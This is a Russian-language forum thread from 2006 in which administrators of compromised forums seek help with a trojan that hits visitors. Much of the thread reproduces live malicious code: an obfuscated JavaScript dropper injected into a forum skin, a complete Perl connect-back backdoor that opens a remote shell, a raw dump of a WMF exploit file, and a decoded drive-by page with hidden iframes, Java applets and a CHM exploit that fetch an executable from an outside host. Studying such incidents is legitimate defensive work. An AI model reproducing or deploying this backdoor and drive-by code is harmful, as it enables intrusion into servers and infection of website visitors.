Deva Опубликовано 10 Июля 2006 Жалоба Поделиться Опубликовано 10 Июля 2006 (изменено) при любом заходе на форум появился троянантивирусная программа блокирует закачку файла и любое обращение к форумучто делать? http://forum.de-va.ru Scan type: Realtime Protection ScanEvent: Virus Found!Virus name: DownloaderFile: C:\Documents and Settings\olia\Local Settings\Temporary Internet Files\Content.IE5\JQ0NVL81\xpladv543[1].wmfLocation: C:\Documents and Settings\olia\Local Settings\Temporary Internet Files\Content.IE5\JQ0NVL81Computer: MMUser: oliaAction taken: Clean failed : Delete failed : Access deniedDate found: Mon Jul 10 15:07:51 2006 Изменено 10 Июля 2006 пользователем Deva Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 FatCat Опубликовано 11 Июля 2006 Жалоба Поделиться Опубликовано 11 Июля 2006 при любом заходе на форум появился троянантивирусная программа блокирует закачку файла и любое обращение к форумуКаспер что-ли вопит о трояне?Зашел для пробы оперой и интернет-эксплорером, антивирус МакЭфи 7 энтерпрайз - не ругается.А почему может верещать глупый Каспер, понять не трудно:.rteiframe { border:1px solid #777; background-color:#FFF; } <...> .iframeshim { position:absolute; display:none; background: #FFF; filter:alpha(opacity=0); border:0px; width:auto; height:auto; }Глупый Каспер не любит слова "iframe"... Кто же догадался такие имена классам дать? Зачем дурачка дразните? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Garret Опубликовано 11 Июля 2006 Жалоба Поделиться Опубликовано 11 Июля 2006 Зачем дурачка дразните? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 DVDima Опубликовано 23 Июля 2006 Жалоба Поделиться Опубликовано 23 Июля 2006 Со своего сайта сегодня троян снимал.нашел его как скрытую ссылку в глобальном скине. вычислили также антивирусом.незнаю как хакер смог залезть в админку, причем с моего айпи зарегистрировал себя, разрешил пхп в аватарах, изображениях и аттачах. Все убрал. теперь на хостинге админку не храню. кто нибудь может перевести белеберду трояна? интересно что он делает-<script>function G(q,g){if(!g)g=' !"#(),-./012345:;<=>ACEGHILMPRTV\\]_abcdefghijklmnopqrstuvwxyz|~';var H;var h='';for(var v=0;v<q.length;v+=arguments.callee.toString().length-380){H=((g.indexOf(q.charAt(v))&255)<<18)|((g.indexOf(q.charAt(v+1))&255)<<12)|((g.indexOf(q.charAt(v+2))&255)<<6)|(g.indexOf(q.charAt(v+3))&255);h+=String.fromCharCode((H&16711680)>>16,(H&65280)>>8,H&255);}eval(h);}</script><script>G(';oVd<"nwEr!#Mc/2H#fh>-:lHb i5c>kEsvb>"noI=ATLbr2Mpjs3AqkH_;p4sn-P()g<(3sM=)a>,z/;=j]2".kR>b#<,z-:t/]1]qpLqPmMdA31,vME(Vj;t.p.p/h>-3oGouj>,H.1=jb3=qeAaai:CH.MrnMM=>z0-mr.dfc<,:lE)n2:pvy1br\\R(ViRbz::t/]=,:wIr!q1sH:1#vb1bzkE)n31<)f<(>wAaP)1rz/1,/p<#roHqP)<)nM2C3cE)n3E<)T=-2xG_>|>,/:0"bT;t3!M(rlPbz21"bm=Cy\\P(b#4t)/.t)k1]nME,//:r!b>"3nL_ATLcr-;<zME(my.Cj-:t/]3=voL(Vj:Cb.:<)ME) iAbH:Gobf>(2|Raaj4t)3.sAi2E;cEqajE)nm<>3gL>\\qHCj-Gs/t2E2xI=)pLcn-:pj]=C2fGA!T5d(oMdbl2C3!P>VzPEanMobj=<nkGb _PAqm5Cf\\=-2pMan#:Cj:.dHq=C3]M>VyAbqr1,/_=C2fIaVy.E;/:pjn<<3nL]uiE)n]<>3:HA _MCuk1"zi=C2xGarTMCqk1(\\l;q3oGaP_Rcz.1()l3=qVAarq1ryr:q\\c="nkIa\\#MbnM<"r-M_2_2cj/1=jg3AzjL(b#<,z-:t/]3AqkH_;p4sn-P()g<(3sM=)a>,z/;=j]2".kR>b#<,z-:t/]1]r:HaVj4s>r5<\\C<<n!Ha\\pE)nn3=qeAaP_Rcz.1()l3=qVAa\\a1rnM=(3!E>nq1s).;<vw2].\\M(r_2df.Gs/f="noGan#0C):Epvn2czsHA iMEmr.dfc<,:lE)n2:pvy1br\\R(ViRbz::t/]=,:wIr!q1sH:1#vb1bzkHa\\a1rnM=(2|Ab!pGc):1)Hw2_m\\H>\\#Gc;/1=fw2_m\\E>nq1s).;<vw2].\\Gqr_0Cf.:ozi=C2xGarTMCqk1=3l;t!oGqb#Lcb2:q)g;q2xMp2z4d nGrnMM>mzPEanMs/_=C2fIaVzPAqm5Cf\\=-2pMan#:Cj:.dHq=C3]M>VyAbqr1,/_=C2fIaVy.E;/:pjn<<3nL]uiE)n]<>3:HA _MCuk1"zi=C2xGarTMCqk1(\\l;q3oGaP_Rcz.1()l3=qVAarq1ryr:q\\c="nkIa\\#MbnM<"r-M_2_2cj/1=jg3AzjL(b#<,z-:t/]3AqkH_;p4sn-P()g<(3sM=)a>,z/;=j]2".kR>b#<,z-:t/]1]r:HaVj4s>r5<\\C<<n!Ha\\pE)nn3=qeAaP_Rcz.1()l3=qVAa\\a1rnM=(3!E>nq1s).;<vw2].\\M(r_2df.Gs/f="noGan#0C):Epvn2czsHA iMEmr.dfc<,:lE)n2:pvy1br\\R(ViRbz::t/]=,:wIr!q1sH:1#vb1bzkHa\\a1rnM=(2|Ab!pGc):1)Hw2_m\\H>\\#Gc;/1=fw2_m\\E>nq1s).;<vw2].\\Gqr_0Cf.:ozi=C2xGarTMCqk1=3l;t!oGqb#Lcb2:q)g;q2xMp2z4d nGrnMM>mzPEanMs/_=C2fIaVzPAqm5Cf\\=-2pMan#:Cj:.dHq=C3]M>VyAbqr1,/_=C2fIaVy.E;/:pjn<<3nL]uiE)n]<>3:HA _MCuk1"zi=C2xGarTMCqk1(\\l;q3oGaP_Rcz.1()l3=qVAarq1ryr:q\\c="nkIa\\#MbnM<"r-M_2_2cj/1=jg3AzjL(b#<,z-:t/]3AqkH_;p4sn-P()g<(3sM=)a>,z/;=j]2".kR>b#<,z-:t/]1]r:HaVj4s>r5<\\C<<n!Ha\\pE)nn3=qeAaP_Rcz.1()l3=qVAa\\a1rnM=(3!E>nq1s).;<vw2].\\M(r_2df.Gs/f="noGan#0C):Epvn2czsHA iMEmr.dfc<,:lE)n2:pvy1br\\R(ViRbz::t/]=,:wIr!q1sH:1#vb1bzkHa\\a1rnM=(2|Ab!pGc):1)Hw2_m\\H>\\#Gc;/1=fw2_m\\E>nq1s).;<vw2].\\Gqr_0Cf.:ozi=C2xGarTMCqk1=3l;t!oE>P#=Cj/1=jg3AzjL(b#<,z-:t/]3AqkH_;p4sn-P()g<(3sM=)a>,z/;=j]2".kR>P).Cr21()n1]r:HaVj4s>r5<\\C<<n!Ha\\pE)nn3=qeA_f!1o2y0,/#4proI>np0C).;<zME(Vj;t.p.p/h<C2fLoui2sn.1#vw4d3wMana4s/3EtAv2E(f4_ueL]b!.tAP2#rgG>np2t/2:q)h>"/sP(r_Gd).5)HP3<nwE>b_:Az:.])\\;q>xE)mr:t/m2>3]M>rmHcf/1=jg="3cGqb#Lc.qEEbi4d!c=>>fLar2Gtfm>(2pH=)_McA:.]bb>"qxL=;PRCn<Gp3b>]qpHabq.C;<EEHP<>AbL(ViLCn-:pjp2pqwM#)qAcj-MrnMI_;THCn<.dHb>"nnAb jGcr.5E/n<(AME-(nP)Hg=E2pLqb).E)21()n3AzjL(np1sP.:p3n3AqkH_;p4sn-P()g<(3sM=)a>,z/;=j]2".kR=)p1sn.1C)y3</wHA iMcarE<vc3,qV."Mf')</script> Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 westex Опубликовано 24 Июля 2006 Жалоба Поделиться Опубликовано 24 Июля 2006 Наверное хакнули сначала тебя (твой ком) а потом и форум. Этим и объясняется регистрация с твоего айпи. Просто трояна схватил, а он прокси на твоем компе открыл. Не, конечно я считаю, вто все намного проще, чем выше описанный способ =) З.Ы. А как понять "разрешил ПХП в аватарах"? Может удаленные аватары? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Bigi Опубликовано 24 Июля 2006 Жалоба Поделиться Опубликовано 24 Июля 2006 хм... терь мой случай... нашёл бэк дор в корне форума... откуда взялся - хз. cbd.pl :#!/usr/bin/perl use Socket; print "Data Cha0s Connect Back Backdoor\n\n"; if (!$ARGV[0]) { printf "Usage: $0 [Host] <Port>\n"; exit(1); } print " Dumping Arguments\n"; $host = $ARGV[0]; $port = 51332; if ($ARGV[1]) { $port = $ARGV[1]; } print " Connecting...\n"; $proto = getprotobyname('tcp') || die("Unknown Protocol\n"); socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n"); my $target = inet_aton($host); if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) { die("Unable to Connect\n"); } print " Spawning Shell\n"; if (!fork( )) { open(STDIN,">&SERVER"); open(STDOUT,">&SERVER"); open(STDERR,">&SERVER"); exec {'/bin/sh'} '-bash' . "\0" x 4; exit(0); }жестоко стреманулся... вроде бы все обновления безопасности ставлю, а тут файлы валяются такого содержания. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 FatCat Опубликовано 24 Июля 2006 Жалоба Поделиться Опубликовано 24 Июля 2006 2DVDima Функции G(q,g) передается зашифрованный текст q, который дешифруется ключем g и затем методом eval() интерпретируется в исполняемый код. Скрипт работать будет только в и-эксплорере, создаст ифрейм и попытается загрузить файлы bag.htm и xpladv543.wmf Посмотри, нет ли этой гадости в корне форума... Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 DVDima Опубликовано 24 Июля 2006 Жалоба Поделиться Опубликовано 24 Июля 2006 FatCat, спасибо. но это код трояна на который у меня была ссылка. сам троян на сайте хакера. сейчас попробую добыть оттуда эти файлы. westex, тип файла установлен был дополнительно для аватар *.php содержание файла bag.htm -<html><body onload="setTimeout('main()', 6000)"><script>function main(){ var yyy = "<bo"+"dy"+" "+"on"+"lo"+"ad=" yyy = yyy +"wi"+"nd"+"ow("+");>" document.write(yyy) window.location.reload() }</SCRIPT></body></html> xpladv543.wmfпоходу просто картинка. XnView ее открывает не ругаясь как синий квадрат в блокноте так выглядит - R = & яяяяя А… Р & яяяя & # яяяя TNPP ё 2 яяO M i & TNPP ф & яяяя & TNPP РА ь f - ъ яяя " - - ! р РА - ь яяя - р ъ " - & яяяя G Џ Б & яяяя ы - & лn3Аd‹@0…Аx V‹@‹p‹@^Г‹@4ѓА|‹@<Г`‹l$$‹E<‹|xэ‹O‹_ Эг3I‹4‹х3А™ь¬„АtБК Рлф;T$(uв‹_$Эf‹K‹_Э‹‹Е‰D$aГл]PRи©яяя‰ѓДѓЗ;сuмГЋNмҐ|y иы—эrюі~Швs3КЉ[OЗї)DиWIн~‹Kг_^ѓм|ѓм‹миAяяя‹РллищяяяXллFЌ}H¤Ђ~яяuщOц‹рѓоEюNЌ}‹ОѓБ ияяяѓБёnetБшPhwini‹ЬQRSяUZY‹Ри]яяялл=3Аfё+а‹фVPяUVяU 3Аfёа3АPPPPPяU$‰E<3АPPPPЌ]HSяu<яU(‰E@ллs3А°ePha.ex‰e83АP°‚P°P2АPP°@БаPяu8яU‰ED3Аfё+а‹фЌ^SfёPЌFPяu@яU,‹F…Аt3АPЌFPяvЌFPяuDяUлРяuDяU3АfёаллB3Й±T+б‹ь3АуЄ‹ьЖDЌwDhuncяhll,fh a.dheя32ha.ex‹МцQVWPPPPPPQPяUяUл^3А@@@лиуяяяБарNV_¬4UЄЂяяuци~юяя=!!%ozz/6=-&<>%2/{7</z19z9:410'41#`af d{0-0Єђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ ђђђђђђђђђђђђђђђђђђђђ . яяя . 2 Ґ* wwwwwwww ы . яяя Љ p . 2 »* wwww = wwwww . яяя . 2 »Ј - . яяя . % 2 »© wwwwwwwwwwwwwwwwwww . яяя ѕ . = 2 С* $ I wwwww B = wwwwwwwwwwwwwwwwwwwww B . яяя . 2 и* I . яяя . џ 2 и1 - . ° яяя . 0 2 и7 wwwwwwwwwwwwwwwwwwwwwwwwww . яяя 2 . $ 2 * wwwwwwwwwwwwwwwwww " й .~ ыея ј @ Times New Roman - р яяя . 2 ѕ wwwwwwwww . ыня ј @ Times New Roman - р яяя . 2 - wwwwwww . яяя . 2 * www = . ѓY яяя .Г W т2 ` wwwwwwwwwww . яяя . 2 ё - . яяя . Н ѕ 1 wwww . яяя . 2 п - . яяя . " 2 ф wwwwwwwwwwwwwwwww . яяя . 2 4* wwwwwwwwwwwww . ‡ яяя . 2 4• а- .џ яяя Ж . $ 2 4› wwwwwwwwwwwwwwwwww ё . яяя . 2 K* JNK = c . яяя . 2 Km - . яяя . 2 Kr Jun N . яяя • . 2 KЈ и . яяя . | 2 K© terminal є яя . 2 Kс kitase . Ѓ яяя . 2 a* п MAPK = . яяя . 2 ax wwwwwww . яяя . 2 aё - . яяя . ! 2 aѕ wwwwwwwwwwwwwwwww $ . яяя < . ~ 2 aI wwwwww ~ . - - „’( И - - яяя ыля ј @ Times New Roman - р яяя .Б 2 B Т qqq = qqqq/qqq Р яяя . 2 B – qqqqqq . яяя . 2 [ Т Р qqqq = qqq . | яяя . 2 [ e qqqqqq . яя. . = 2 u Т$ qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq B Ф . яяя . . 2 Џ Т eeeeeeeeeeeeeeeeeeeeeeeee . яяя‚ ф . 2 Ё Т PI . яяяе . у 5 2 Ё з - . яяя . 2 Ё о 3 . яяяC . 2 Ё ю eeeeee . яяя . 2 Ё = = . яяя . % 2 Ё O eeeeeeeeeeeeeeeeeeee № K . яяя8 . 2 Ё ~ . яяя . 2 Ё 3 . яяяћ . 2 Ё eeeeeъ . яяя . " 2 В Т PKB, eee = eeeeeee “ . яяя . 2 В ” eeeeee . Тяя/ .О 2 В У eeeee C . яяя . 2 Ь Т !eeeee = eee . `яяя . Џ2 ЬУS ћ№ . Ъ яяя . 2 Ж Z eeeeeeeeee IDH . яяя . ѓ 2 Ь д - . яяя . › 2 Ь л 1/ . яяя q .] 2 Ь ь Ced . ( яяя . 2 Ь - . яяя . 2РЬ ' 3 . яяя . 2 Ь 2 - g . яяя . 7 2 х Т eeeeeeeeeeeeeeeeeeeeeen eeeeee y . яяя . 2 Т RIP = . ыия ј @ Times New Roman -§ р Ќяяя . 2 receptor . ыля ј @ Times New Roman - р яяя . 2 e - . P яяя . % 2 l eeeeeeeeeeeeeeeeeee A . яяя .Х 2 ,Т SAPK = eeeeee ° . Ряя ќ . + 2 GT - . яяя . ! 2 ,[ eeeeeeeeeeeeeeeee „ . M яяя6 . 2 ,ь eeeeee . яяя . 2 EТ eeeћ= eeeeeeee . яяя . 2 E† kinase . яяя . . 2 _Т TdT . яяя . 2 _я = terminal C . яяя . Ђ 0 2 _e eeeeeeeeeeeeeeeeeeeeeeeeeee « ћ . яяя . 2 yТ TNF = . яяя . 2 y eeeee . яяя . u 2 yQ eeeeeeeeeeeeeee . яяя . %[ 2 ’Т eeee = eeeeeeeeeeee Ё . яяя . 2 ¬Ю eeeeeeeeeeee 4 . яяя . 2 ¬n - . яяo . + 2 ¬u eeeeeeeeeeeeeeeeeeeeeee . яяя . 2 ЖТ eeeeeee . яяя . 2 ЯТ TRAF = eeee . яяя ¬ . Т ” Я\ - . яяя . " 2 Яc eeeeeeeeeeeeeeeee . яяя . 2 щТ TRAIL = TNF s . яяя . § щW - . яяя . ! 2 щ^ eeeeeeeeeeeeeeeee . яяя . 2 щш - . яяя . 2 щ eeeeeeee . яяя . 2 Т eeeeee . яяя . 2 ,Т eeeee = . яяя . Ш 2 ,2 TdT . яяя ¤ . 2 ,Y} - . є яяя . 2 ,a eeeeeeee . яяя . 2 ,» eeee . яяя . 2 ,ц eeeeeeee . яяя . 2 ,C - . яяя . 2 FТ eeeeeeee . яяя . 2 `Т zVAD . яяя . 2 ` . . яяя . ? 2 ` eee 0 . яяя . 2 `8 = . яяя . ! 2 `J eeeeeeeeeeeeeeeee Ї . яяя Э . 2 `ц - . яяя . 2 `лэ eeeeee . яяя . 2 `4 - . яяя . 2 `; eeeeeee O . яяя . 2 `} - . яяя . чb 1 Г2 yТ eeeeeeeeeeeeeeeeeeeeeeeeeeee . - - ы ј о"System о - р & TNPP & яяяя Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Indi Опубликовано 2 Августа 2006 Жалоба Поделиться Опубликовано 2 Августа 2006 (изменено) хехх... не "блакнотом" открытый код смотреть нужно Изменено 2 Августа 2006 пользователем Indi Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 FatCat Опубликовано 2 Августа 2006 Жалоба Поделиться Опубликовано 2 Августа 2006 Держи полный расшифрованый код:<IFRAME src="xpladv543.wmf" width=1 height=1></IFRAME><APPLET height=1 archive=java.jar width=1 code=GetAccess.class><PARAM NAME="modulepath" VALUE="http://zchxsikpgz.biz/dl/loaderadv543_2.exe"></APPLET><IFRAME border=0 src="fillmemadv543.htm" frameBorder=0 width=1 height=1></IFRAME><IFRAME border=0 src="fillmemadv543.htm" frameBorder=0 width=1 height=1></IFRAME><IFRAME border=0 src="fillmemadv543.htm" frameBorder=0 width=1 height=1></IFRAME><IFRAME border=0 src="fillmemadv543.htm" frameBorder=0 width=1 height=1></IFRAME><IFRAME border=0 src="fillmemadv543.htm" frameBorder=0 width=1 height=1></IFRAME><IFRAME border=0 src="fillmemadv543.htm" frameBorder=0 width=1 height=1></IFRAME><IFRAME border=0 src="fillmemadv543.htm" frameBorder=0 width=1 height=1></IFRAME><IFRAME border=0 src="fillmemadv543.htm" frameBorder=0 width=1 height=1></IFRAME><IFRAME border=0 src="bag.htm" frameBorder=0 width=1 height=1></IFRAME><APPLET height=1 archive=loaderadv543.jar width=1 code=Counter></APPLET> <OBJECT type=text/x-scriptlet data=ms-its:mhtml:nosuch.mht!http://zchxsikpgz.biz/dl/adv543/x.chm::/x.htm></OBJECT> Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Вопрос
Deva
при любом заходе на форум появился троян
антивирусная программа блокирует закачку файла и любое обращение к форуму
что делать?
http://forum.de-va.ru
Scan type: Realtime Protection Scan
Event: Virus Found!
Virus name: Downloader
File: C:\Documents and Settings\olia\Local Settings\Temporary Internet Files\Content.IE5\JQ0NVL81\xpladv543[1].wmf
Location: C:\Documents and Settings\olia\Local Settings\Temporary Internet Files\Content.IE5\JQ0NVL81
Computer: MM
User: olia
Action taken: Clean failed : Delete failed : Access denied
Date found: Mon Jul 10 15:07:51 2006
Изменено пользователем DevaСсылка на комментарий
Поделиться на других сайтах
9 ответов на этот вопрос
Рекомендуемые сообщения
Присоединиться к обсуждению
Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.